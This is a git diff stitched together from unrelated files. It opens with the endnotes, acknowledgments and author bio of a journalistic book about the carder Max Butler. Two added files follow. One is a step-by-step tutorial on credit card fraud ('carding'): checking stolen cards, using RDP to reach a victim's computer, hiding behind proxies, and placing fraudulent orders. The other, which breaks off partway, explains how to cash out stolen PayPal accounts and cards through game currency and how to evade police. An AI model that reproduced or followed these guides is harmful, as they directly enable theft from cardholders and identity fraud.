+because we have criminals phoning in tips about +other criminals?” One unanswered question is to +what degree, if any, the Secret Service leaned on +hacked information provided by the VPD to build +cases in the United States. The Secret Service +declined to make agents available to the author: +“Although we have chosen not [to] participate with +this particular project, feel free to approach us with +other ideas in the future.” +2 the same user had once registered another + +address through the company: Max says Night Fox +was responsible for registering the Financial Edge +News website and made this blunder. + +Chapter 29: One Plat and Six Classics +1 “for 150 classics”: Affidavit of Secret Service +Special Agent Roy Dotson, July 24, 2007, filed in +USA v. E-Gold, LTD, 1:07-cr-0019, U.S. District +Court for the District of Columbia. For the complete +history of e-gold, see Kim Zetter, “Bullion and +Bandits: The Improbable Rise and Fall of E-Gold,” +Wired.com, June 9, 2007. +2 They were working closely with Silo’s handler at +the Vancouver Police Department: Word of the +meeting got back to Liske. “There was an +accusation that I was Iceman,” he said in an +interview. “And there was a big presentation made +that this guy was Iceman. And the people this was +presented to knew full well that I wasn’t.” + +Chapter 30: Maksik +1 straight from Maksik’s massive database of stolen +cards: U.S. v. Maksym Yastremski, 3:06-cr-01989, +U.S. District Court for the Southern District of +California. +2 In early 2006, the Ukranians finally identified +Maksik as one Maksym Yastremski: Interview with +Greg Crabb. +3 they secretly copied his hard drive for analysis: +Government filing dated July 24, 2009, in U.S. v. +Albert Gonzalez, 2:08-cr-00160, U.S. District Court +for the Eastern District of New York. +4 “We were lucky in this case, because Salgado’s +purchaser was cooperating with the FBI”: Written +testimony of Robert S. Litt, deputy attorney general, +before the Subcommittee on Telecommunications, +Trade and Consumer Protection, House Commerce +Committee, September 4, 1997 +(http://www.justice.gov/criminal/cybercrime/daag9_97.htm). +5 But the feds lost the crypto wars: For a detailed +history, see Steven Levy, Crypto: How the Code +Rebels Beat the Government—Saving Privacy in +the Digital Age (New York: Penguin Books, 2002). + +Chapter 31: The Trial +1 “So, you take my girls out to party now?”: Interview +with Giannone. +2 Once a jury is seated, a defendant’s chances for +acquittal are about one in ten: Fiscal year 2006. +Calculated from “Federal Justice Statistics, 2006— +Statistical Tables,” U.S. Department of Justice, +Bureau of Justice Statistics, May 1, 2009 +(http://bjs.ojp.usdoj.gov/index.cfm? +ty=pbdetail&iid=980). +3 “I suspect that you are never going to look at the +Internet exactly the same way again”: Trial +transcript in U.S. v. Jonathan Giannone, 3:06-cr- +01011, U.S. District Court for the District of South +Carolina. Some grammatical changes were made +for readability. +4 “Who’s Iceman?”: Interview with Giannone. + +Chapter 32: The Mall +1 his new partner, twenty-three-year-old Guy Shitrit: +Information about Shitrit’s trouble in Miami comes +from Aragon. Detective Robert Watts of the Newport +Beach Police Department confirmed he’d heard the +same account. Shitrit, now in custody, did not +respond to a letter from the author. +2 His wife, Clara, had brought in $780,000 on eBay +in a little over three years: Based on sales figures +from Clara Aragon’s eBay account obtained by the +Newport Beach Police Department. Aragon +declined to discuss his profits. +3 Max, he felt, was ignoring the Whiz List, their +blueprint for building one big score and getting out: +Interview with Aragon. When police searched +Aragon’s cell phone, they found this entry on his +electronic to-do list: “tackle whiz list.” +4 in meticulous, hand-drawn spreadsheets +summing up how much Chris owed her for each in- +store appearance: One such spreadsheet was +seized by the Newport Beach Police Department +and seen by the author. +5 Vigo was looking for a way to pay down a $100,000 +debt to the Mexican Mafia: This according to Vigo’s +statements to the police following his arrest. The +Newport Beach Police Department found a copy of +the shipping manifest in Vigo’s office. +6 Bloomingdale’s security people didn’t like to upset +the store’s customers: Interview with Detective +Robert Watts. + +7 thirty-one Coach bags, twelve new Canon +PowerShot digital cameras: Per the search warrant +seizure records. + +Chapter 33: Exit Strategy +1 Max decided to invest in a rope ladder: Interview +with Max. +2 Max finally learned about Giannone’s bust from a +news article: Kim Zetter, “Secret Service Operative +Moonlights as Identity Thief,” Wired.com. June 6, +2007 +(http://www.wired.com/politics/law/news/2007/06/secret_service). +3 He was growing jumpier every day: Based on an +interview with Charity Majors. Max says he was alert +but not jumpy. +4 a judge approved his legal name change from +Max Butler to Max Ray Vision: In Re: Max Ray +Butler, CNC-07-543988, County of San Francisco, +Superior Court of California. +5 Silo had hidden a second message: Interview with +Max. Lloyd Liske would neither confirm nor deny this +account. +6 The company openly marketed the service as a +way to circumvent FBI surveillance: “In some +countries, government sponsored projects have +been set up to collect massive amounts of data from +the Internet, including emails, and store them away +for future analysis. […] One example of such a +program was the FBI’s Carnivore project. By using +Hushmail, you can be assured that your data will be +protected from that kind of broad government +surveillance.” +http://www.hushmail.com/about/technology/security/. + +7 forced Hushmail officials to sabotage their own +system and compromise specific surveillance +targets’ decryption keys: Ryan Singel, “Encrypted E- +Mail Company Hushmail Spills to Feds,” Wired.com. +November 7, 2007. Detective Mark Fenton of the +Vancouver Police Department said he provided +Max’s Hushmail e-mail to the Secret Service. +8 It was supposed to be a training run for one of +Chris’s new recruits: Interviews with Tsengeltsetseg +Tsetsendelger and Chris Aragon. +9 a female Secret Service agent disguised as a +maid: The Secret Service’s surveillance, including +the ride up the elevator with Max, was described in +an affidavit in U. S. v. Max Ray Butler, 2:07-cr- +00332, U.S. District Court for the Western District of +Pennsylvania. Max said in an interview that the +agent was dressed as a maid. FBI agent Mularski +says the surveillance was on and off for months. +10 Chris picked out Max’s mugshot from the photos: +U.S. v. Max Ray Butler, 2:07-cr-00332, U.S. District +Court for the Western District of Pennsylvania. +Aragon says the government tricked him by telling +him Max had already been arrested, but he also +gave them information on Max’s security measures, +which undermines that claim. Court records for +Aragon’s criminal case in Orange County indicate a +sealed letter from Dembosky is on file. The People +of the State of California vs. Christopher John +Aragon, et al., 07HF0992, Superior Court of +California, County of Orange. +11 Two had lost power when an agent tripped over an +electrical cable: According to Max. + +12 Max’s head snapped to look at Master Splyntr: +Interview with Mularski. +13 “You were right”: Interview with Charity Majors. +14 “Why do you hate us?”: Interview with Max. + +Chapter 34: DarkMarket +1 he told a harrowing story: “Son bilgiyi verecekken +yok oldu!” Haber 71, August 12, 2008 +(http://www.haber7.com/haber/20080812/Son- +bilgiyi-verecekken-yok-oldu.php). +2 fingering a known member of Cha0’s organization +as the shipper: Mularski described the genesis of +the investigation. The role played by the shipping +companies was detailed by Uri Rivner of RSA in a +blog post (http://www.rsa.com/blog/blog_entry.aspx? +id=1451). The Turkish National Police referred +inquiries to their embassy in Washington, DC, which +declined to make detectives available for interviews. +3 a tall, beefy man with close-cropped hair and a +black T-shirt emblazoned with the Grim Reaper: +Per police video of the arrest and search. Also see +“Enselenen Chao sanal semayi anlatti,” Haber 7, +September 12, 2008 +(http://www.haber7.com/haber/20080912/Enselenen- +Chao-sanal-semayi-anlatti.php). +4 matching his appearances at the Java Bean with +JiLsi’s posts: Interview with Mularski. Also see +Caroline Davies, “Welcome to DarkMarket—global +one-stop shop for cybercrime and banking fraud,” +Guardian, January 4, 2010 +(http://www.guardian.co.uk/technology/2010/jan/14/darkmarket- +online-fraud-trial-wembley). +5 JiLsi’s associate, sixty-seven-year-old John +“Devilman” McHugh, Ibid. +6 Erkan “Seagate” Findikoglu: Interview with + +Mularski. Also see Fusun S. Nebil, “FBI Siber +Suçlarla, ABD Içinde ve Disinda Isbirlikleri ile +Mücadele,” Turk.internet.com, June 15, 2010 +(http://www.turk.internet.com/portal/yazigoster.php? +yaziid=28171). +7 Twenty-seven members of Seagate’s organization +were charged in Turkey: Interview with Mularski. +8 a reporter for Südwestrundfunk, Southwest +Germany public radio: The reporter was Kai +Laufen. See +http://www.swr.de/swr2/programm/sendungen +/wissen/- +/id=660374/nid=660374/did=3904422/p6601i/index.html. +9 The U.S. press picked up the story: The author +was the first to identify J. Keith Mularski by name as +the FBI agent posing as Master Splyntr, in +“Cybercrime Supersite ‘DarkMarket’ Was FBI Sting, +Documents Confirm,” Wired.com, October 13, 2008 +(http://www.wired.com/threatlevel/2008/10/darkmarket- +post/). + +Chapter 35: Sentencing +1 It had taken the CERT investigators only two +weeks to find the encryption key: Max well knew that +the key was vulnerable while in RAM, but he +believed the software security on his server would +prevent anyone from gaining access to its memory. +CERT’s Matt Geiger, who led the forensics team, +declined to comment on how he bypassed that +security but he said he was able to run memory- +acquisition software on Max’s computer. +2 Max had stolen 1.1 million of the cards from point- +of-sale systems: Max didn’t challenge this amount +for sentencing, but in interviews he expressed +disbelief that the number could be that high. + +Chapter 36: Aftermath +1 An undercover Secret Service operative lured him +to a nightclub: “2010 Data Breach Investigations +Report,” Verizon RISK Team in cooperation with the +United States Secret Service, July 28, 2010. +2 ICQ user 201679996: Affidavit In Support of Arrest +Warrant, May 8, 2007, U.S. v. Albert Gonzalez, +2:08-mj-00444, U.S. District Court for the Eastern +District of New York. +3 it was Jonathan James who would pay the highest +price: See the author’s “Former Teen Hacker’s +Suicide Linked to TJX Probe,” Wired.com, July 9, +2009 +(http://www.wired.com/threatlevel/2009/07/hacker/). +4 They recruit ordinary consumers as unwitting +money launderers: For more detail on these so- +called “money mule” scams, see the blog of former +Washingtonpost.com reporter Brian Krebs, who has +covered the crime extensively: +http://krebsonsecurity.com/. +5 the Secret Service had been paying Gonzalez an +annual salary of $75,000 a year: First reported in +Kim Zetter, “Secret Service Paid TJX Hacker +$75,000 a Year,” Wired.com, March 22, 2010. +6 filed by the attorneys general of 41 states: Sources +include Dan Kaplan, “TJX settles over breach with +41 states for $9.75 million,” SC Magazine, June 23, +2009 (http://www.scmagazineus.com/tjx-settles- +over-breach-with-41-states-for-975- +million/article/138930/). + +7 another $40 million to Visa-issuing banks: Mark +Jewell, “TJX to pay up to $40.9 million in settlement +with Visa over data breach,” Associated Press, +November 30, 2007. +8 Heartland had been certified PCI compliant: +Sources include Ellen Messmer, “Heartland breach +raises questions about PCI standard’s +effectiveness,” Network World, January 22, 2009 +(http://www.networkworld.com/news/2009/012209- +heartland-breach.html). +9 Hannaford Brothers won the security certification +even as hackers were in its systems: Sources +include Andrew Conry-Murray, “Supermarket Breach +Calls PCI Compliance into Question,” +InformationWeek, March 22, 2008. +10 The restaurants filed a class-action lawsuit: +http://www.prlog.org/10425165-secret-service- +investigation-lawsuit-cast-shadow-over-radiant- +systems-and-distributo.html. Also, “Radiant Systems +and Computer World responsible for breach +affecting restaurants—lawsuit,” Databreaches.net, +November 24, 2010 (http://www.databreaches.net/? +p=8408) and Kim Zetter, “Restaurants Sue Vendor +for Unsecured Card Processor,” Wired.com, +November 30, 2009 +(http://www.wired.com/threatlevel/2009/11/pos). +11 White hats have devised attacks against chip- +and-PIN: See Steven J. Murdoch, Saar Drimer, +Ross Anderson, and Mike Bond, “Chip and PIN Is +Broken,” University of Cambridge Computer +Laboratory, Cambridge, UK. Presented at the 2010 +IEEE Symposium on Security and Privacy, May + +2010 +(http://www.cl.cam.ac.uk/research/security/banking/nopin/). +The response by the UK Card Association is at +http://www.theukcardsassociation.org.uk/ +view_point_and_publications/what_we_think/- +/page/906/. +12 hundreds of thousands of point-of-sale terminals +with new gear: The cards themselves are more +expensive as well. For a more thorough discussion +of the issues holding back chip-and-PIN’s adoption +in the United States, see Clases Bell, “Are chip and +PIN credit cards coming?” Bankrate.com, February +18, 2010 +(http://www.foxbusiness.com/story/personal- +finance/financial-planning/chip-pin-creditcards- +coming/). See also Allie Johnson, “U.S. credit cards +becoming outdated, less usable abroad,” +Creditcards.com (http://www.creditcards.com/credit- +card-news/outdated-smart-card-chip-pin-1273.php). + +Epilogue +1 His mother suggested he get an agent: A letter to +the author from Aragon. + +ACKNOWLEDGMENTS +I first encountered Max Vision some ten years ago, when I +was a newbie reporter for the computer security site +SecurityFocus.com. Max was then facing charges over his +scripted attack on thousands of Pentagon systems, and I +was fascinated by the story playing out in the Silicon Valley +courtroom, where the federal justice system was bearing +down on a once-respected computer security expert who’d +upended his life with a single, quixotic hack. +Years later, after I’d reported on hundreds of computer +crimes, vulnerabilities, and software glitches, Max was +arrested again, and a new federal indictment exposed the +secret life he’d led after his fall from grace. As I +investigated, I grew certain that Max, more than anyone +else, embodied the sea change I’d witnessed in the world +of hacking, and would be the perfect lens through which to +explore the modern computer underground. +Fortunately, others agreed. I owe a debt of thanks to my +agent, David Fugate, who guided me through the process +of developing my idea into a book proposal, and my editor +at Crown, Julian Pavia, who worked tirelessly to keep me +on course and only slightly behind schedule throughout a +year of reporting, writing, and rewriting. +Also crucial was the enormous support from my boss, +Evan Hansen, editor in chief at Wired.com. And I’m grateful +to my colleagues at Wired.com’s Threat Level blog, Kim +Zetter, Ryan Singel, and David Kravets, who collectively +shouldered the burden of my absence for two months while +I finished the book and then braved the burden of my +irritable, bleary-eyed return afterward. +My thanks also to Joel Deane and Todd Lapin, who +showed me the ropes when I became a journalist in 1998, +and Al Huger and Dean Turner of SecurityFocus.com. + +and Al Huger and Dean Turner of SecurityFocus.com. +Jason Tanz at Wired magazine did an amazing job with my +feature article on Max, “Catch Me If You Can,” in the +January 2009 issue. +Among my guides in this book were the cops, feds, +hackers, and carders who spoke with me at length, with no +benefit to themselves. FBI Supervisory Special Agent J. +Keith Mularski was particularly generous with his time, and +Max Vision spent many hours on the prison phone and +writing long e-mails and letters to share his story with me. +My thanks to U.S. Postal Inspector Greg Crabb, +Detective Bob Watts of the Newport Beach Police +Department, former FBI agent E. J. Hilbert, and Assistant +U.S. Attorney Luke Dembosky, the latter of whom wouldn’t +tell me much, but was always nice about it. And I’m grateful +to Lord Cyric, Lloyd Liske, Th3C0rrupted0ne, Chris +Aragon, Jonathan Giannone, Tsengeltsetseg +Tsetsendelger, Werner Janer, Cesar Carranza, and other +veterans of the carder scene who asked to remain +unnamed. +The story of Max Vision would have listed heavily to his +criminal side were it not for Tim Spencer and Marty +Roesch, who shared their experience of Max as white-hat +hacker, and Kimi Mack, who spoke candidly about her +marriage to Max. My thanks also to security wunderkind +Marc Maiffret, who helped isolate some of Max’s exploits. +The underworld that Kingpin delves into has been +illuminated by a number of first-rate journalists, including +Bob Sullivan, Brian Krebs, Joseph Menn, Byron Acohido, +Jon Swartz, and my Wired colleague Kim Zetter. +Finally, my thanks to my wife, Lauren Gelman, without +whose loving support and sacrifice this book would not +have been possible, and to Sadelle and Asher, who will find +their computer use closely supervised until they’re eighteen. + +ABOUT THE AUTHOR +KEVIN POULSEN is a senior editor at Wired.com and a +contributor to Wired magazine. He oversees cybercrime, +privacy, and political coverage for Wired.com and edits the +award-winning Threat Level blog (wired.com/threatlevel), +which he founded in 2005. He’s broken numerous national +stories, including the FBI’s use of spyware in criminal and +national security investigations; a hacker’s penetration of a +Secret Service agent’s confidential files; and the secret +arrest of an Army intelligence officer accused of leaking +documents to whistle-blowing website WikiLeaks. In 2009 +he was inducted into MIN’s Digital Hall of Fame for online +journalism and in 2010 was voted one of the “Top Cyber +Security Journalists” by his peers. diff --git a/MASTERTHEARTOFCARDINGBEGINNERSGUIDE_txt.md b/MASTERTHEARTOFCARDINGBEGINNERSGUIDE_txt.md new file mode 100644 index 0000000..8462e15 --- /dev/null +++ b/MASTERTHEARTOFCARDINGBEGINNERSGUIDE_txt.md @@ -0,0 +1,148 @@ +# MASTERTHEARTOFCARDINGBEGINNERSGUIDE + + +--- + +ined: Mon Jun 06, 2016 2:48 pm +Post Mon Jun 06, 2016 3:27 pm +Master The Art Of Carding Technique For Beginners 2016 +Lets start with the basics........ +What is carding? +CARDING is the art of credit card manipulation to access goods or services by fraud in other words Carding is an expression of the activity of shopping in cyberspace (via Laptop/Computer), using various other means of payment are not valid, generally carding identical to credit card transactions, and basically used the credit card does not belong the carder is but the property of others. +But don’t let the “politically correct” definition of carding stop fool you, because carding is more than that. Different people card for different reasons, the main motive of Carder is usually to buy something without giving a penny. Yeah, handling a $780 Iphone6s in your hands and knowing that you didn’t pay a penny for such. So you are much excited to know more about carding tutorial for noobs, don’t worry i will help you out of carding tutorial for beginners, but before preceding let me tell what will be our main focus. + +carding tutorial technique +carding tutorial india +carding tutorial for noobs +carding tutorial for beginners +carding tutorial 2016 +tutorial carding credit card 2016 +First of all you have to get working credit card details but also sites that allows the carding option, means that the site has to be “Cardable“. Cardable website are the one whose payment processor is vulnerable enough that you won’t have issues by using someone else credit card to make the payment, you just need the full information from the holder and you are set to go, you can easily check vulnerability of a company with foot printing technique. But some other websites will have higher security and are the most of them secure. Why do I say that? because it’s true.its not about how many cards you have, its all about how to deal with these secure websites. + +If you have a card from Aarav from US, you must be Aarav Singh from US. Depending on the information that you have acquired from Aarav Singh, you must convince merchants and I-stores that you are Aarav Singh. When approaching these I-stores, you want to scope things out first. Ask yourself a few questions before preceding any thing: +-Whats their policy on different shipping address than billing address? + +If they have a “must call” policy, make sure to give them an anonymous number where you can be reached, or give away them fake sim and afterword destroy it. + +-Do they accept other payments besides credit card? + +If they accept other payment methods, sometimes its easier to card with a different payment method. + +Whatever you card, make sure that you have all your info prepped before carding it. If you’re carding something over 1000, get on your anonymous or fake call and call up the banking institution of the person’s card you’re holding. Make sure to let them know that you’re making a purchase of a large limit, so they don’t deny your card. + +For those you will need to break and confuse the payment processor making it believe you are the real card holder. For doing this carding tutorial properly you will be required following things as given below: +Requirements for carding tutorial beginners: +1.Good/Fresh CCV +How To check CCV number Dead/Alive: +First Go To Site http://www.waitawayapp.com and Signup> Write Info Fake Or Real> Wrtie Cc Number + cvv2 + exp > If An Error Occurred While Processing You Transaction Please Contact Support, this mean your CVV Is Dead >If Thank You Then it means your CVV is Live +2. A Laptop/Personal Computer +3.Virtual Private Network (Any: Paid/Free) +4.Remote Desktop Protocol (RDP) +5. SOCKS server proxies +6. Full Anonymity +7.Patience + +Carding Tutorial Step by Step: +Step#1 Configure a Virtual private network (VPN) which extends a private network across a public network, such as the Internet- you can setup free VPN connection by clicking here.It enables a computer to send and receive data across shared or public networks as if it was directly connected to the private network, while benefiting from the functionality, security and management policies of the private network.This is done by establishing a virtual point-to-point connection through the use of dedicated connections, encryption, or a combination of the two. VPN services come both as Paid as well as free but you can get FREE Premium Zenmate VPN connection for lifetime from us. +Step#2 Now setup RPD – Remote Desktop Protocol (RDP) which is a proprietary protocol developed by Microsoft, which provides a user with a graphical interface to connect to another computer over a network connection. The user employs RDP client software for this purpose, while the other computer must run RDP server software. +Clients exist for most versions of Microsoft Windows (including Windows Mobile), Linux, Unix, Mac OS X, iOS, Android, and other modern operating systems. RDP servers are built into Windows operating systems; an RDP server for Linux also exists. By default, the server listens on TCP port 3389. Microsoft currently refers to their official RDP server software as Remote Desktop Services, formerly “Terminal Services”. Their official client software is currently referred to as Remote Desktop Connection, formerly “Terminal Services Client” +You can connect to RPD by clicking on start menu – remote desktop connection – then type victims ip address. +Example 74.7.42.89,click connect, now it will pop up screen asking for password and username which is in this case: User name: Shipping Password shipping Now click ok, and you will get access to Remote Desktop Connection – which means you are connected to someone computer and you will buy stuff from victims computer. Not YOURS! +Step#3 Now search for SOCKS server proxies (It is an Internet protocol that routes network packets between a client and server through a proxy server). SOCKS5 additionally provides authentication so only authorized users may access a server. Practically, a SOCKS server proxies TCP connections to an arbitrary IP address, and provides a means for UDP packets to be forwarded. SOCKS performs at Layer 5 of the OSI model (the ******* layer, an intermediate layer between the presentation layer and the transport layer). +How to use socks5 server proxy? + +Example of socks4/socks5 are 75.119.127.189:36871 .Socks5 are very easy to use via Mozilla Firefox. First open Mozilla Firefox>Options>Advanced>Network>Connections>Settings. Now the screen will pop up various options like : + +#1 No proxy +#2 Auto Detect +#3 Use system proxy +#4 Manual proxy configuration +Now go to Manual proxy configuration. Now type in socks host IP you have, example Socks Host: 75.119.127.189 Port: 1080. Press ok and you are connected to secure socks5. +Step#4 Now it comes to most crucial step -Victims credit card. You can get a lot of free credit cards here on ABH, or you can buy one from various cvv shops that can be find on internet. Example off victims credit card: + +First Name : Aarav +Middle Name : Singh +Last Name : Rao +Spouse Name : XXXXXXX +Father Name :XXXXXXXx +Billing Address : 29 Hole in the circle street +City : XXXX +State : Uk +Zip Code : 20452 +Country : India +Phone Number : 568045587 +Credit Card Information : +********* +Card Type : Credit +Credit Card Number : 5102 4129 0001 1332 +Exp. Date : 6/June / 2012 +Name On Card : Aarav Singh +Cvv2 : 786 +Mother Maiden Name : penny +Social Security Number : 2568745 +Birth Day : 28 +Birth Month : 02 +Birth Year : 1999 +Account Information : +******* +AOL ID : aarav@aol.com +Password : Cns$26gs_=2 + +Please Note: This is only an example of victims credit card, you don’t need to fill all this information to card like DOB (date of birth) SSN (social security number) etc. Some sites ask only for card numbers, exp date and cvv2. Now that all you need to start carding, lets get started. + +Suppose you want to buy an Iphone6/Iphone6s,Note4 edge etc. First of all i will be needing website which belongs to my country. This is because you would not like to wait for a week or a month for package.In my country they deliver around in 2 days or most probably 3. I am sure there is a lot of cell phones shops in any country. Use google search engine and and find them. + +Basically coming into the Online Shops details they are of two types: + +#1 VBV: +VBV is a Verified by Visa, an online security system for credit card transactions. Which means you need to provide a card knowing a lot of victim credit card information such as DOB (date of birth), SSN (social security numbers), Secure password witch cc owner use for online purchase. You can check on shop is there a VBV VERIFIED BY VISA ICON on home page. + +#2 NON VBV: +NON VBV is not verified by visa card, you can buy anything with non VBV cards without going through verification process. We leave now this for later. +Follow these Baby steps given below: + +Step#1 Connect to your VPN connection software and Choose your default Country + +Step#2 Connect to RPD ( Remote Destkop connection), must be same country (IP), state as card holder Address. + +Step#3 Now from your RPD, connect to socks5 via Mozzila Firefox, example 97.77.96.226 34539, Must be same as written on Holders Card Number: COUNTRY, STATE, CITY etc + +Step#4 When you done all that, create email with same name as credit card holder name, same address, same city, and everything. Or if you got email access that would be a lot better . + +Step#5 Go to your website shop you want to card. ( dont be lazy and find a good yours private shop from your country or any other that ships worldwide). + +Step#6 Register with credit card holder information, name, country, city, address, and email you made one just for this ORDER. + +Step#7 Add a shipping address, some sites do not allow to ship to different address but there is plenty of other shops witch do. Shipping address is where the package of your product will be delivered. Which means you can provide your address,friends, colleagues address etc + +Step#8 Select product you want, and click on check out, now it will ask for you know, how you will pay. Choose credit card, and type victims credit card numbers and other information needed. + +Step#9 Click order now, and I am sure they will confirm your order via email or you will get track your order on website, after pressing order. + +Note: Some sites need phone verification, but you can always buy phone number, confirm your order, and destroy it after they ship your item. + +Step#10 Wait for order to arrive to your shipping address, I personally use FEDEX, EURO EXPRESS, CITY EXPRESS. When they arrive they call me, I used to give them different address where i want to pick up my order from.Now calm down like you just stole 100 MILION US DOLLARS and take the package. Use item for you self or sell it, and then repeat till you die!!! +How to become anonymous while CARDING? + +Hiding your identity while surfing through the internet is challenging, but this era have made a lot of changes from past. Hiding your identity while surfing through the Internet is not as tough as you think .Most of us know that security plays an important role while Carding is done. No one wants to give the federal’s the satisfaction of busting us and shutting down production, so we should stay anonymous as possible +First of all let me remind you that there’s no 100% safe guaranteed way to Carding. Don’t let people fool you into thinking that. There are many ways to be caught like proxies, socks, and whatever else in the world, where you leave “digital fingerprints” wherever you go. For my personal benefits, I use a carded ISP combined with an anonymizer account. + +#1 CARDED ISP: I personally dont know how safe is Carding because in my personal experience till now i haven’t caught till now. Some popular ISPs to card are Earthlink Pre-paid (you can pre-pay it up to a year, look for the link on their confusing website) and America Online (better used for a quickie card, just get out one of their 849308490383904 free 10000000 hour cds and input a few ccs into that *****) + +#2 www.anonymizer.com as it gives a level 1 proxy. But I don’t recommend that for everyone. As it offers excellent services for those that want to remain anonymous. The setback is that its a service, and like any other service provided, you have to pay for usage and they will restrict your account due to fraudulent usage. Just card another one rite? If you are eagerly planning to use anonymizer, just concentrate on keeping your IP as secret as possible from their services instead of the site which you are about to card. The only set-back to the service is that they have some issues with sites using Java Applets, meaning you might have to skip out on some major sites that require JAVA. + +#3 Stealther: There is a problem out there that will actually link your proxies together for maximum anonymity. This program is called Stealther and it is registered via key (so you can go to #serialz on efnet and get a key) and is a descent anonymous program. + +#4 Proxies: I use a private hidden proxies which are paid but you can search for free also- Free proxies might don’t work as far as I remember. You can get free proxies from www.anonymitycheker.com/page1.htm this is a descent site which ranks their proxies from “transparent” (leaks your ip) to “highly anonymous.” they also do real-time proxy tests and other. + +There are a plenty of list for stealth mode out there: these are just the popular ones which i discussed above. If you feel you have an anonymity method that worked for you please let us know below the comment box. +If you might need to know how anonymous you really are, there are some simple Hacks for testing it: + +Link given below provides you how annonymous you are: + +#1 www.whatismyip.com: It is a simple method of knowing what your ip is on the web. This does not run though JAVA so you cant really tell if your anonymous or not from this site alone. + +#2 http://www.multiproxy.org/env_check.htm: This is a basic level of anonymity. Must have JAVA enabled — the true purpose of this site is to promote their software (multiproxy) which works in similar fashion such like stealther. +#3 http://www.sinfulcherries.com/?aid=525390: This is actually a porn website protected by ibill. When you try to sign-up there, it is a java applet that tells you “your current IP is being recorded. Any fraudulent will be reported.” If its not your real IP, you p***ed the second test. (you can also check your ccs here) + +Whatever your personal reason for carding tutorial for noobs, this Carding technique tutorial should answer a few noobie questions and take the guessing out of the entire carding game. The resources and techniques mentioned in this carding tutorial are NOT, I repeat, NOT the only methods of carding. Experience in carding is key. You have to practice your own methods and try out new techniques in carding to really get a system that works for you. And one more thing I do not guarantee that this will fully work for most of you who decide to try this out, but you may find information out of here useful to use doing something similar or some of you will have a great success with it. This tutorial is meant to get you on your way. diff --git a/MMO CURRENCY RUNSCAPE_pdf.md b/MMO CURRENCY RUNSCAPE_pdf.md new file mode 100644 index 0000000..11697ef --- /dev/null +++ b/MMO CURRENCY RUNSCAPE_pdf.md @@ -0,0 +1,284 @@ +# MMO CURRENCY RUNSCAPE + + +--- + +Brief Introduction: This guide is in +depth and portrayed visually, but however +this isn’t a cook book. I’m not going to +post images of everything like turning on +your VPN or else this would be like 30 +pages. +The base method for cashing out Paypal/CC +are MMO Currency. Now before you freak +out and think to yourself, “THIS IS WAY +TOO HARD”, Don’t worry, I got everything +the whole way. And also I offer 16 hours +of support on AlphaBay. +Now let me tell you why MMO Currency is +the most efficient way to cashout a +Paypal. The main currency used for buying +MMO Currency is Paypal, but however +individuals who sell MMO Currency also +use Bitcoins, Perfect Money, Bank +Transfer, Western Union. When new forms of currency evolved a few +years ago like Bitcoins/Liberty Reserve, Chinese goldfarmers (A small +group who generate gold by farming gold. Basically its labor, but in +a game. +But let me be specific. Most of you may know a game called Rune +Scape. Probably through TV, Walmart giftcard shelfs etc. +What this guide outlines is to cashout Paypal balance + Credit Card +through a MMO Currency gold ‘Runescape Gold’ but however with this +you can literally use this method on any ‘GAME CURRENCY’. +Now that you are more familiar with this, let start. +NOTE: Read all the headings in front of the numbers. If all of these +are familiar to you, skip Step 1 and proceed to Step 2 because it is +a waste of your time. +What you need is: +Buy from a respected vendor, preferably Tor Carding Forum (Help the +community grow ). Now the thing is, vendors do not sell (most of the +time) Paypal Accounts with Balance because for one, it is a weak rare +find, and there is only a few vendors who actually sells these. But +no +problem, there are a lot of Paypal accounts that have been linked to +CC’s and Bank Accounts which is a secondary payment option. Through + +experience, if a Paypal account is linked to a lot of Bank Accounts +and CC’s (2­3+ per payment option), I could cashout $500+ at average. +What you must be aware of: Paypal Accounts cost varies from $1­$5 +each. But however each account has a 20­30% chance of having a +security measure. Now unless you have the FULL CC details of the +Paypal Account and Bank Account number, your not going to be able to +bypass this. But there is 1 way to do it, but it decreases your +chances of cashing out the Balance (which I will explain later in the +guide). +Okay now this is the complicated part. Carding Paypals payment +gateway is relatively hard to fraud (at least for me so far). The +security is very dead solid, however has loop holes. One thing to +point out from experience, 80­90% of the CC’s are either not valid, +already linked to another PP Account (Someone either already carded +it, or original card holder has linked it) or Paypal just declines +the card for a reason beyond my knowledge (Sometimes they just do it +because it seems fishy even if you have gotten everything correct). I +recommend buying from the vendor iSellPizza from TCF (you can find +him at Market Place ­> CC & CVV) as most of the CC’s were not linked +to any Paypal Account and 90% was valid (he gives replacement if +not). +VPN + Socks 5: Without these your not going to be able to Card/Pay +safely (the FBI could come for you) and paying is MOST likely not to +work (99%). I recommend www.vip72.org (they have the best socks in my +opinion). Also I recommend the VPN www.hidemyass.com for the best +quality without DNS leaks. I’m assuming you know how to connect to +Socks5 and VPNs….. If you don’t however, I don’t bite, I will explain +to you thoroughly through ICQ/Tor Chat/Jabber/PM. +Mac Address changer: In some cases if your mac address is the same, +the LE’s can have evidence that you were responsible of such a crime. +DNS Leak: If this leaks, you could be in big trouble. No biggie, this +is how you fix this problem. How to check if your DNS is leaking? +Connect to your VPN, go to dnsleaktest.com and click the big button +below. (the one on the page not here you halfwit….) +Now wait for the next page to popup. Now if you are connected to a +VPN service and ANY of the servers listed below are not provided by +the VPN service then your DNS may be leaking. Let me put this into +context of why you should worried. If your DNS leaks, and your ISP is +shown, the LE can contact them and ask them for your personal details +(eg. Residential Address). Then they would proceed by interrogating +you. Through a similar problem based on DNA Leaks I was interrogated +(not because of Paypal) but + +however I learned to stay stubborn and continuously deny all +statements held against me (If you ever end up in my position PLEASE +NEVER GRANT PERMISSION FOR A POLY GRAPH EXAMINATION). Okay now to +fix this problem: +The solution is to ensure that once connected to the anonymity +network, you are using ONLY the DNS server/s provided by the +anonymity service. As this problem affects predominantly windows +clients, only solutions for Windows appear here. +3 basic steps to fix the problem; +1. Before connecting to the VPN, set static IP address properties if +you are using DHCP 2. After connecting, remove DNS settings for the +primary interface 3. After disconnecting, switch back to DHCP if +neccessary or reapply original static DNS servers +Solution A ­ Automatic +If you are using OpenVPN on Windows XP/Vista/7 then a fully automated +solution is available. +Download dnsfixsetup.exe ­ (md5 checksum: +f212a015a890bd2dae67bc8f8aa8bfd9) +After installation, when you connect to a VPN server, a batch file +will be run executing the 3 steps above. +Three scripts are generated for each OpenVPN configuration file; +1. configfilename_pre.bat ­ executed when you initiate the connection +but before the connection is established ­ Calls pre.vbs ­ If any +active DHCP adapters exist, switch to static 2. configfilename_up.bat +­ executed when the connection is established ­ Calls up.vbs ­ Clear +the DNS servers for all active adapter except the TAP32 adapter 3. +configfilename_down.bat ­ executed after the connection is +disconnected ­ Calls down.vbs ­ Reconfigure adapters back to their +original configuration +Solution B ­ Manually clearing the 